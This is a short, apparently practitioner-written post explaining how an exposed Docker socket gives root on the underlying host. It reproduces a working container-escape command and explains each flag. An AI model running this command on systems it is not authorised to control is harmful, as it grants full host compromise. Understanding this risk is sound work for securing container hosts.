The best way that I’ve found to execute commands on the underlying host with an exposed Docker socket is Ian Miell’s most pointless docker command ever
The command looks like this :-
docker run -ti –privileged –net=host –pid=host –ipc=host –volume /:/host busybox chroot /host
and will essentially drop you straight into a full root shell on the underlying host.
To break the command down
–privileged will remove the default Docker security layers like Apparmor and capability restrictions.
–net=host –pid=host –ipc=host runs the process in the host’s namespaces instead of a separate set of namespaces for the contained process.
–volume /:/host mounts the host root filesystems as /host inside the container
chroot /host as a command changes the root to that /host directory.
If you’re running via Kubernetes, you can use The most pointless Kubernetes command which effectively does the same thing (assuming the cluster doesn’t have a restrictive Pod Security Policy in place).